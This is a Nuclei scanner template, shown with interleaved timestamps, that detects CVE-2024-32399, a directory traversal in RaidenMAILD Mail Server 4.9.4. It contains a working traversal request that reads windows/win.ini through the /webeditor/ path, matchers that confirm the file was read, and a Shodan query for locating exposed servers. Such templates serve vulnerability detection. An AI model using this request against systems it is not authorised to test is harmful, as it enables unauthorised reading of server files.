2024-04-24 15:09:05 +00:00
id : CVE-2024-32399
info :
name : RaidenMAILD Mail Server v.4.9.4 - Path Traversal
author : DhiyaneshDK
severity : high
description : |
Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.
reference :
- https://owasp.org/www-community/attacks/Path_Traversal
- https://github.com/NN0b0dy/CVE-2024-32399/blob/main/README.md
- https://github.com/NN0b0dy/c01/blob/main/01.pdf
- https://github.com/NN0b0dy/CVE-2024-32399
- https://github.com/nomi-sec/PoC-in-GitHub
classification :
epss-score : 0.00043
epss-percentile : 0.08167
metadata :
verified : true
max-request : 1
shodan-query : html:"RaidenMAILD"
tags : cve,cve2024,lfi,raiden,mail,server
2024-05-10 10:17:47 +00:00
http :
2024-04-24 15:09:05 +00:00
- method : GET
path :
- "{{BaseURL}}/webeditor/../../../windows/win.ini"
matchers :
2024-04-25 11:12:54 +00:00
- type : dsl
dsl :
- 'contains_all(body, "[fonts]", "for 16-bit app support")'
- 'contains(header, "application/octet-stream")'
- 'status_code == 200'
condition : and
2024-05-10 10:24:47 +00:00
# digest: 4b0a00483046022100c68ae449c313523a338ad0b181aaa41e15eda98a9b200d3ed208a44ae24127a6022100e2c5a881638a9019355b8922941feb90086ba1dfe4d8175bfd566c3122caf772:922c64590222798bb761d5b6d8e72950